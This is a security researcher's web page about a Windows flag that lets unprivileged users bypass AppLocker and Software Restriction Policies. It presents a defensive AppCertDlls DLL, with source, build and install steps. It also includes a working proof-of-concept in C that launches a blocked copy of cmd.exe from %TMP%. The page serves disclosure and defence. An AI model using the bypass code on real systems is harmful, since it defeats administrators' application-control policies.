Prevent Bypass of AppLocker and SAFER alias Software Restriction Policies Valid HTML 4.01 Transitional Valid CSS Valid SVG 1.0

Me, myself & IT

Prevent Bypass of AppLocker and SAFER alias Software Restriction Policies

Purpose
Reason
Demonstration
Mitigation
Source and Build Instructions
Implementation and Build Details
Authenticity and Integrity
Download
Installation
Automatic online installation
Manual offline installation
Update
Deinstallation

Purpose

APPCERT.DLL evaluates the SAFER security level of every application to be started by the Win32 functions CreateProcess(), CreateProcessAsUser(), CreateProcessWithLogonW() and CreateProcessWithTokenW(): it allows process creation for the security levels SAFER_LEVELID_FULLYTRUSTED alias Unrestricted and SAFER_LEVELID_NORMALUSER alias Basic User, or denies process creation for the security levels SAFER_LEVELID_CONSTRAINED alias Restricted, SAFER_LEVELID_UNTRUSTED alias Untrusted and SAFER_LEVELID_DISALLOWED alias Disallowed.

In case of denial it writes an entry 865, 866, 867, 868 or 882 from source Software Restriction Policies (on Windows XP and Windows Server 2003) or Microsoft-Windows-SoftwareRestrictionPolicies (on Windows Vista® and newer versions of Windows NT) to the Event Log.

Reason

The process creation flag CREATE_PRESERVE_CODE_AUTHZ_LEVEL of the Win32 functions CreateProcess(), CreateProcessAsUser(), CreateProcessWithLogonW() and CreateProcessWithTokenW() allows unprivileged users to bypass both AppLocker and SAFER alias Software Restriction Policies in all versions of Windows NT:
CREATE_PRESERVE_CODE_AUTHZ_LEVEL
0x02000000
Allows the caller to execute a child process that bypasses the process restrictions that would normally be applied automatically to the process.

This bypass may also be exercised indirect: the flag SAFER_TOKEN_MAKE_INERT of the Win32 function SaferComputeTokenFromLevel() allows to create an inert token which can then be (ab)used with the Win32 functions CreateProcessAsUser() and CreateProcessWithTokenW(); both Win32 functions but require privileges to be held by their caller which are not assigned to unprivileged users.

Note: the flag LOAD_IGNORE_CODE_AUTHZ_LEVEL of the Win32 function LoadLibraryEx() and the flag SANDBOX_INERT of the Win32 function CreateRestrictedToken() enable this bypass too; both are but disabled for unprivileged users in Windows 8 and newer versions of Windows NT (in Windows 7 and Windows Server 2008 R2 with the hotfix 2532445, the hotfix 2894252, or the convenience rollup update 3125574).

Demonstration

Perform the following 5 simple steps to demonstrate the AppLocker and SAFER alias Software Restriction Policies bypass.

  1. Enable SAFER alias Software Restriction Policies and block execution in the user’s %TMP% directory per registry path rule, for example with the following Registry entries: 

    REGEDIT4

; Copyright © 2004-2025, Stefan Kanthak <‍stefan‍.‍kanthak‍@‍nexgo‍.‍de‍>

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers]
"AuthentiCodeEnabled"=dword:00000000
"DefaultLevel"=dword:00040000        ; 'Unrestricted'
"PolicyScope"=dword:00000000         ; Apply to 'Users' and 'Administrators'
"TransparentEnabled"=dword:00000002  ; Apply to executable files and DLLs

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{6B29FC40-CA47-1067-B31D-00DD010662DA}]
"Description"="%TMP%"
"ItemData"=hex(2):"25,48,4b,45,59,5f,43,55,52,52,45,4e,54,5f,55,53,45,52,5c,45,6e,76,69,72,6f,6e,6d,65,6e,74,5c,54,4d,50,25,00
;"ItemData"=expand:"%HKEY_CURRENT_USER\\Environment\\TMP%"

  2. Copy the Command Processor %COMSPEC% into your %TMP% directory and verify that execution is blocked there: 

    COPY "%COMSPEC%" "%TMP%"
"%TMP%\Cmd.exe"
RENAME "%TMP%\Cmd.exe" cmd12345.tmp
"%TMP%\cmd12345.tmp"
"%SystemRoot%\System32\CertUtil.exe" /ERROR %ERRORLEVEL%
            1 file(s) copied.
This program is blocked by group policy. For more information, contact your system administrator.
This program is blocked by group policy. For more information, contact your system administrator.
0x4ec (WIN32: 1260 ERROR_ACCESS_DISABLED_BY_POLICY) -- 1260 (1260)
Error message text: This program is blocked by group policy. For more information, contact your system administrator.
CertUtil: -error command completed successfully.

  3. Create the text file APPCERT.C with the following content in an arbitrary, preferable empty directory: 

    // Copyright © 2004-2025, Stefan Kanthak <‍stefan‍.‍kanthak‍@‍nexgo‍.‍de‍>

#define STRICT
#define UNICODE
#define WIN32_LEAN_AND_MEAN

#include <windows.h>

__declspec(safebuffers)
BOOL	CDECL	PrintConsole(HANDLE hConsole, [SA_FormatString(Style="printf")] LPCWSTR lpFormat, ...)
{
	WCHAR	szOutput[1024];
	DWORD	dwOutput;
	DWORD	dwConsole;

	va_list	vaInput;
	va_start(vaInput, lpFormat);

	dwOutput = wvsprintf(szOutput, lpFormat, vaInput);

	va_end(vaInput);

	if (dwOutput == 0)
		return FALSE;

	if (!WriteConsole(hConsole, szOutput, dwOutput, &dwConsole, NULL))
		return FALSE;

	return dwConsole == dwOutput;
}

const	STARTUPINFO	si = {sizeof(si)};

__declspec(noreturn)
VOID	CDECL	wmainCRTStartup(VOID)
{
	PROCESS_INFORMATION pi;

	WCHAR	szSource[MAX_PATH];
	DWORD	dwSource;
	WCHAR	szBuffer[MAX_PATH];
	DWORD	dwBuffer;
	DWORD	dwError = ERROR_SUCCESS;
	HANDLE	hConsole = GetStdHandle(STD_ERROR_HANDLE);

	if (hConsole == INVALID_HANDLE_VALUE)
		dwError = GetLastError();
	else
	{
		dwSource = GetEnvironmentVariable(L"COMSPEC", szSource, sizeof(szSource) / sizeof(*szSource));

		if (dwSource == 0)
			PrintConsole(hConsole,
			             L"GetEnvironmentVariable() returned error %lu\n",
			             dwError = GetLastError());
		else
		{
			dwBuffer = GetTempPath(sizeof(szBuffer) / sizeof(*szBuffer), szBuffer);

			if (dwBuffer == 0)
				PrintConsole(hConsole,
				             L"GetTempPath() returned error %lu\n",
				             dwError = GetLastError());
			else
			{
				if (GetTempFileName(szBuffer, L"cmd", 0, szBuffer) == 0)
					PrintConsole(hConsole,
					             L"GetTempFileName() returned error %lu\n",
					             dwError = GetLastError());
				else
				{
					if (!CopyFile(szSource, szBuffer, FALSE))
						PrintConsole(hConsole,
						             L"CopyFile() returned error %lu\n",
						             dwError = GetLastError());
					else
					{
						if (!CreateProcess(szBuffer,
						                   L"CMD.EXE /D /K SET \"\"",
						                   (LPSECURITY_ATTRIBUTES) NULL,
						                   (LPSECURITY_ATTRIBUTES) NULL,
						                   FALSE,
						                   CREATE_DEFAULT_ERROR_MODE | CREATE_NEW_CONSOLE | CREATE_PRESERVE_CODE_AUTHZ_LEVEL | CREATE_UNICODE_ENVIRONMENT,
						                   L"",
						                   (LPCWSTR) NULL,
						                   &si,
						                   &pi))
							PrintConsole(hConsole,
							             L"CreateProcess() returned error %lu\n",
							             dwError = GetLastError());
						else
						{
							PrintConsole(hConsole,
							             L"Process %lu with primary thread %lu started from file \'%ls\'\n",
							             pi.dwProcessId, pi.dwThreadId, szBuffer);

							if (!CloseHandle(pi.hThread))
								PrintConsole(hConsole,
								             L"CloseHandle() returned error %lu\n",
								             dwError = GetLastError());

							if (!CloseHandle(pi.hProcess))
								PrintConsole(hConsole,
								             L"CloseHandle() returned error %lu\n",
								             dwError = GetLastError());
						}
					}

					if (!DeleteFile(szBuffer))
						PrintConsole(hConsole,
						             L"DeleteFile() returned error %lu\n",
						             dwError = GetLastError());
				}
			}
		}
	}

	ExitProcess(dwError);
}

  4. Run the following four command lines to build the console application APPCERT.EXE from the source file APPCERT.C created in step 3. and cleanup afterwards: 

    SET CL=/GA /GF /GS /Gd /Gy /O2 /Os /Oy /W4 /we4013 /Zl
SET LINK=/EMITTOOLVERSIONINFO:NO /ENTRY:wmainCRTStartup /LARGEADDRESSAWARE /NOCOFFGRPINFO /NODEFAULTLIB /OPT:REF /OSVERSION:5.1 /RELEASE /SUBSYSTEM:CONSOLE /VERSION:0.815
CL.EXE APPCERT.C KERNEL32.LIB USER32.LIB
ERASE APPCERT.OBJ
    For details and reference see the MSDN articles Compiler Options and Linker Options.

    Note: if necessary, see the MSDN article Use the Microsoft C++ toolset from the command line for an introduction.

    Note: APPCERT.EXE is a pure Win32 console application and builds without the MSVCRT libraries.

    Note: the command lines can be copied and pasted as block into a Command Processor window. 

    Microsoft (R) 32-bit C/C++ Optimizing Compiler Version 16.00.40219.01 for 80x86
Copyright (C) Microsoft Corporation.  All rights reserved.

APPCERT.C
APPCERT.C(86) : warning C4090: 'function' : different 'const' qualifiers

Microsoft (R) Incremental Linker Version 10.00.40219.386
Copyright (C) Microsoft Corporation.  All rights reserved.

…

  5. Execute the console application APPCERT.EXE built in step 4.: the copy of the Command Processor starts from the %TMP% directory despite the blocking SAFER registry path rule!

Mitigation

AppCertDlls are loaded during the first call of one of the Win32 functions CreateProcess(), CreateProcessAsUser(), CreateProcessWithLogonW() and CreateProcessWithTokenW() in every (user) process; their CreateProcessNotify() routine is called with PROCESS_CREATION_QUERY as reason whenever an application is to be started.
If one of the AppCertDlls returns a negative NTSTATUS like 0xC0000372 alias STATUS_ACCESS_DISABLED_NO_SAFER_UI_BY_POLICY, process creation is denied and the Win32 functions CreateProcess*() yield an error code like 786 alias ERROR_ACCESS_DISABLED_NO_SAFER_UI_BY_POLICY; process creation is allowed only if all AppCertDlls return a non-negative NTSTATUS like 0x00000000 alias STATUS_SUCCESS.

Caveat: the NTSTATUS 0xC0000372 alias STATUS_ACCESS_DISABLED_NO_SAFER_UI_BY_POLICY was chosen deliberately to avoid possible problems in non-interactive processes: as its name implies, it instructs its receiver to deny access without displaying an error message.

Note: the APPCERT.DLL offered for download use the other NTSTATUS codes to let their caller(s) display error messages.

Note: AppCertDlls are not documented by Microsoft®!

Note: Windows 11, where Services.exe and WinInit.exe execute as Protected Process Lite, writes an error message with event id 3033 plus an information message with event id 3089 and source Microsoft-Windows-CodeIntegrity to the Microsoft-Windows-CodeIntegrity/Operational event log.

Source and Build Instructions

Perform the following 4 simple steps to build APPCERT.DLL from the source and install it.

  1. Create the text file APPCERT.C with the following content in an arbitrary, preferable empty directory: 

    // Copyright © 2004-2025, Stefan Kanthak <‍stefan‍.‍kanthak‍@‍nexgo‍.‍de‍>

#define STRICT
#define UNICODE
#define WIN32_LEAN_AND_MEAN

#define WINVER		0x0500
#define _WIN32_WINNT	0x0500

#include <windows.h>
#include <winsafer.h>
#include <wintrust.h>

typedef	enum	_REASON
{
	PROCESS_CREATION_QUERY   = 1,
	PROCESS_CREATION_ALLOWED = 2,
	PROCESS_CREATION_DENIED  = 3
} REASON;

// see <https://msdn.microsoft.com/en-us/library/cc231200.aspx>
// and <https://msdn.microsoft.com/en-us/library/cc704588.aspx>

typedef	enum	_NTSTATUS
{
	STATUS_SUCCESS                               = 0x00000000,
	STATUS_ACCESS_DISABLED_BY_POLICY_DEFAULT     = 0xC0000361,
	STATUS_ACCESS_DISABLED_BY_POLICY_PATH        = 0xC0000362,
	STATUS_ACCESS_DISABLED_BY_POLICY_PUBLISHER   = 0xC0000363,
	STATUS_ACCESS_DISABLED_BY_POLICY_OTHER       = 0xC0000364,
	STATUS_ACCESS_DISABLED_NO_SAFER_UI_BY_POLICY = 0xC0000372
} NTSTATUS;

__declspec(safebuffers)
NTSTATUS	NTAPI	CreateProcessNotify(LPCWSTR lpApplicationName, REASON enReason)
{
	NTSTATUS	ntStatus = STATUS_SUCCESS;

	// see <https://msdn.microsoft.com/en-us/library/ms722431.aspx>

	SAFER_CODE_PROPERTIES	scp = {sizeof(scp),
				       SAFER_CRITERIA_AUTHENTICODE | SAFER_CRITERIA_IMAGEHASH | SAFER_CRITERIA_IMAGEPATH,
				       (LPCWSTR) NULL,
				       (HANDLE) NULL,
				       0,
				       {0},
				       0,
				       {0, 0},
				       (ALG_ID) 0,
				       (LPBYTE) NULL,
				       HWND_DESKTOP,
				       WTD_UI_NONE};

	SAFER_LEVEL_HANDLE	slh;

	DWORD	dwLevelId;
	DWORD	dwDummy;

	switch (enReason)
	{
	case PROCESS_CREATION_QUERY:

		// called once for each process that is to be created:
		// return STATUS_SUCCESS to allow process creation or
		// return STATUS_ACCESS_DISABLED_NO_SAFER_UI_BY_POLICY to deny process creation

		scp.ImagePath = lpApplicationName;

		// see <https://msdn.microsoft.com/en-us/library/ms722428.aspx>

		if (!SaferIdentifyLevel(1, &scp, &slh, NULL))
			OutputDebugStringA("AppCert!CreateProcessNotify: SaferIdentifyLevel() failed!\n");
		else
		{	// see <https://msdn.microsoft.com/en-us/library/ms722426.aspx>

			if (!SaferGetLevelInformation(slh, SaferObjectLevelId, &dwLevelId, sizeof(dwLevelId), &dwDummy))
				OutputDebugStringA("AppCert!CreateProcessNotify: SaferGetLevelInformation() failed!\n");
			else
				// see <https://msdn.microsoft.com/en-us/library/ms722425.aspx>

				if (dwLevelId < SAFER_LEVELID_NORMALUSER)
				{
					ntStatus = STATUS_ACCESS_DISABLED_NO_SAFER_UI_BY_POLICY;

					// see <https://msdn.microsoft.com/en-us/library/ms722430.aspx>

					if (!SaferRecordEventLogEntry(slh, scp.ImagePath, NULL))
						OutputDebugStringA("AppCert!CreateProcessNotify: SaferRecordEventLogEntry() failed!\n");
				}

			// see <https://msdn.microsoft.com/en-us/library/ms722423.aspx>

			if (!SaferCloseLevel(slh))
				OutputDebugStringA("AppCert!CreateProcessNotify: SaferCloseLevel() failed!\n");
		}

		break;

	case PROCESS_CREATION_ALLOWED:

		// called once for each process that is allowed creation;
		// the return value is discarded

	//	…

		break;

	case PROCESS_CREATION_DENIED:

		// called once for each process that is denied creation;
		// the return value is discarded

	//	…

		break;

	default:
		;
	}

	// the return value is only used for PROCESS_CREATION_QUERY,
	// and discarded for all other reasons

	return ntStatus;
}

  2. Run the following four command lines to build the DLL APPCERT.DLL from the source file APPCERT.C created in step 1. and cleanup afterwards: 

    SET CL=/GA /GF /GS /Gd /Gy /O1 /Os /Oy- /W4 /we4013 /Zl
SET LINK= /DLL /EXPORT:CreateProcessNotify /LARGEADDRESSAWARE /NOCOFFGRPINFO /NODEFAULTLIB /NOENTRY /OPT:REF /OSVERSION:5.1 /RELEASE /SUBSYSTEM:WINDOWS /VERSION:0.815
CL.EXE APPCERT.C ADVAPI32.LIB KERNEL32.LIB
ERASE APPCERT.EXP APPCERT.LIB APPCERT.OBJ
    For details and reference see the MSDN articles Compiler Options and Linker Options.

    Note: if necessary, see the MSDN article Use the Microsoft C++ toolset from the command line for an introduction.

    Note: APPCERT.DLL is a pure Win32 DLL and builds without the MSVCRT libraries.

    Note: the command lines can be copied and pasted as block into a Command Processor window. 

    Microsoft (R) C/C++ Optimizing Compiler Version 16.00.40219.01 for x64
Copyright (C) Microsoft Corporation.  All rights reserved.

APPCERT.C

Microsoft (R) Incremental Linker Version 10.00.40219.386
Copyright (C) Microsoft Corporation.  All rights reserved.

   Creating library APPCERT.lib and object APPCERT.exp
…
    Note: for systems with AMD64 alias x64 processor architecture, build APPCERT.DLL for the I386 alias x86 processor architecture too! 
    Microsoft (R) C/C++ Optimizing Compiler Version 16.00.40219.01 for 80x86
Copyright (C) Microsoft Corporation.  All rights reserved.

APPCERT.C

Microsoft (R) Incremental Linker Version 10.00.40219.386
Copyright (C) Microsoft Corporation.  All rights reserved.

   Creating library APPCERT.lib and object APPCERT.exp
…

  3. Copy the DLL APPCERT.DLL built in step 2. into Windows’ system directory %SystemRoot%\System32\.

    Note: on systems with AMD64 alias x64 processor architecture, additionally copy APPCERT.DLL built for the I386 alias x86 processor architecture into the directory %SystemRoot%\SysWoW64\.

  4. Run the following command line to activate it: 

    "%SystemRoot%\System32\Reg.exe" ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\AppCertDlls" /V "AppCert.dll" /T REG_SZ /D "%SystemRoot%\System32\AppCert.dll" /F

Implementation and Build Details

APPCERT.DLL is a pure Win32 DLL, written in ANSI C, built with the Platform SDK for Windows Server 2003 R2 Microsoft Visual C++ Compiler 2010 SP1 from update 2519277, but without the MSVCRT libraries, for use on Windows XP and newer versions of Windows NT.

APPCERT.DLL is available for the I386 alias x86, AMD64 alias x64 and IA64 processor architectures of Windows NT.

Authenticity and Integrity

APPCERT.DLL and the cabinet file APPCERT.CAB are digitally signed using an X.509 certificate issued by WEB.DE TrustCenter E-Mail Certification Authority.
Serial number of the certificate
0x0465CEF9 = 73780985
Fingerprint of the certificate
MD5: 33 33 6e 1d 26 18 a7 c2 be 87 11 68 05 2c 70 09
SHA-1: 8c 5b 75 21 40 41 77 ac 54 13 13 02 06 6b b0 69 10 2e 83 0e
-----BEGIN RSA PUBLIC KEY-----
MIIBCgKCAQEA6ipnm9vAs63w+TM+9UcG1yQ8CRIxMz/tTXry9MCbeHpkiM/qdPaRWlwVTW2j
PhC81xwIPZXgE1FE4DgE1eImb33DG2YfEBY/ARpMaGUnme+85WmExWWc/YMUAaHOMYQ3TQDX
0V/7yuhfa9Uc29ljtQ2AB0MjhXTJvGguvZZTI5A3rcN4+AKwmETdYH+8OQKMU2s+2H9CVfaD
waX0aj9CeibGNooLTgDchzCBIC5J47qHned/3ZqnMDjYCv3Yc1HNgcbM+ZKzPoD8jShb/ptI
wWPo9s00KEs9ti68RsmejqKovAmdLSzFLGARbue2uiqs4piJkxI0LS5+NTTPyZjsSwIDAQAB
-----END RSA PUBLIC KEY-----
Download and install the CA and root X.509 certificates of WEB.DE to validate and verify the digital signature.

Note: unfortunately WEB.DE abandoned their trust center in 2018 and removed all pages and download links in 2019; fortunately the Wayback Machine archived the TrustCenter page, the CA and the root certificate.

Note: due to its counter signature alias timestamp the digital signature remains valid past the X.509 certificates expiration date!

Download

AMD64\APPCERT.DLL, I386\APPCERT.DLL, IA64\APPCERT.DLL and the setup script APPCERT.INF are packaged in the (compressed and digitally signed) cabinet file APPCERT.CAB. 
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

X:\>EXTRACT.EXE /D APPCERT.CAB
Microsoft (R) Cabinet Extraction Tool - Version 5.1.2600.5512
Copyright (c) Microsoft Corporation. All rights reserved..

 Cabinet APPCERT.CAB

06-11-2018 10:07:18p A---        12,291 APPCERT.INF
06-11-2018 10:05:40p A---        31,960 AMD64\APPCERT.DLL
06-11-2018 10:05:30p A---        31,448 I386\APPCERT.DLL
06-11-2018 10:05:46p A---        35,544 IA64\APPCERT.DLL
                 4 Files        111,243 bytes

X:\>DIR APPCERT.CAB
 Volume in drive X has no label.
 Volume Serial Number is 1957-0427

 Directory of X:\

06/11/2018  10:08 PM            29,628 APPCERT.CAB
               1 File(s)         29,628 bytes
               0 Dir(s)    9,876,543,210 bytes free

X:\>SIGNTOOL.EXE Verify /V APPCERT.CAB

Verifying: APPCERT.CAB
SHA1 hash of file: (not calculated)
Signing Certificate Chain:
    Issued to: WEB.DE TrustCenter
    Issued by: WEB.DE TrustCenter
    Expires:   30.08.2024 09:49:34
    SHA1 hash: C8301016951187E6320569B3ED54F34845B51638

        Issued to: WEB.DE TrustCenter E-Mail Certification Authority
        Issued by: WEB.DE TrustCenter
        Expires:   30.08.2024 09:50:51
        SHA1 hash: 8946380C6E370988FB587257A9F9A5CD323045F0

            Issued to: Stefan Kanthak
            Issued by: WEB.DE TrustCenter E-Mail Certification Authority
            Expires:   15.12.2018 02:16:19
            SHA1 hash: 8C5B7521404177AC54131302066BB069102E830E

The signature is timestamped: 11.06.2018 22:08:12
Timestamp Verified by:
    Issued to: Thawte Timestamping CA
    Issued by: Thawte Timestamping CA
    Expires:   01.01.2021 01:59:59
    SHA1 hash: BE36A4562FB2EE05DBB3D32323ADF445084ED656

        Issued to: Symantec Time Stamping Services CA - G2
        Issued by: Thawte Timestamping CA
        Expires:   31.12.2020 01:59:59
        SHA1 hash: 6C07453FFDDA08B83707C09B82FB3D15F35336B1

            Issued to: Symantec Time Stamping Services Signer - G4
            Issued by: Symantec Time Stamping Services CA - G2
            Expires:   30.12.2020 01:59:59
            SHA1 hash: 65439929B67973EB192D6FF243E6767ADF0834E4

Successfully verified: APPCERT.CAB

Number of files successfully Verified: 1
Number of warnings: 0
Number of errors: 0

X:\>
On Windows Vista and newer versions of Windows NT, run the following command line to extract all files into the specified directory, preserving their paths: 
"%SystemRoot%\System32\Expand.exe" APPCERT.CAB /F:* "‹target directory›"
Note: Expand.exe from prior versions of Windows NT ignores the paths and junks them; use Extract.exe from the Support Tools on Windows XP and Windows Server 2003 instead!

Note: if you open APPCERT.CAB with Windows Explorer, switch to Details view and turn on the Path column!

Installation

Installation requires administrative privileges and access rights.

The setup script APPCERT.INF copies the appropriate APPCERT.DLL to %SystemRoot%\System32\APPCERT.DLL and creates the following Registry entry to activate it: 

REGEDIT4

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\AppCertDlls]
"AppCert.dll"="C:\\Windows\\System32\\AppCert.dll"
Caveat: this Registry entry is not preserved by the bi-annual function updates or upgrades on Windows 10 and has to be restored afterwards!

Note: on systems with AMD64 alias x64 processor architecture, the installation must be run in the native (64-bit) execution environment to install APPCERT.DLL for both processor architectures!

Automatic online installation

When visited with Internet Explorer, this web page will prompt to install (the contents of) the package using Internet Component Download.

Note: on systems with AMD64 alias x64 processor architecture, Internet Explorer (x64) must be used!

Manual offline installation

Download the package APPCERT.CAB and verify its digital signature, then open it in Windows Explorer, extract its contents preserving the directory structure, right-click the extracted setup script APPCERT.INF to display its context menu and click Install to run the installation.

Note: on Windows Vista and newer versions of Windows NT, InfDefaultInstall.exe, the application registered for the Install verb of *.inf files, requests administrative privileges.

Update

The setup script supports the update from any previous version: just install the current version!

Deinstallation

Deinstallation requires administrative privileges and access rights.

On Windows XP and Windows Server 2003, open the Add/Remove Programs applet of the Control Panel, tick the checkbox Updates, select the entry Prevent bypass of AppLocker and SAFER alias Software Restriction Policies underneath Systemkonfiguration and click the Remove button.

On Windows Vista and newer versions of Windows NT, open the Control Panel and click the entry View installed updates underneath the Programs and Features or Programs category.
In Installed Updates select the entry Prevent bypass of AppLocker and SAFER alias Software Restriction Policies underneath Systemkonfiguration and click the Uninstall menu entry.

Contact and Feedback

If you miss anything here, have additions, comments, corrections, criticism or questions, want to give feedback, hints or tipps, report broken links, bugs, deficiencies, errors, inaccuracies, misrepresentations, omissions, shortcomings, vulnerabilities or weaknesses, …: don’t hesitate to contact me and feel free to ask, comment, criticise, flame, notify or report!

Use the X.509 certificate to send S/MIME encrypted mail.

Note: email in weird format and without a proper sender name is likely to be discarded!

I dislike HTML (and even weirder formats too) in email, I prefer to receive plain text.
I also expect to see your full (real) name as sender, not your nickname.
I abhor top posts and expect inline quotes in replies.

Terms and Conditions

By using this site, you signify your agreement to these terms and conditions. If you do not agree to these terms and conditions, do not use this site!

Data Protection Declaration

This web page records no (personal) data and stores no cookies in the web browser.

The web service is operated and provided by

Telekom Deutschland GmbH
Business Center
D-64306 Darmstadt
Germany
<‍hosting‍@‍telekom‍.‍de‍>
+49 800 5252033

The web service provider stores a session cookie in the web browser and records every visit of this web site with the following data in an access log on their server(s):

Copyright © 1995–2025 • Stefan Kanthak • <‍stefan‍.‍kanthak‍@‍nexgo‍.‍de‍>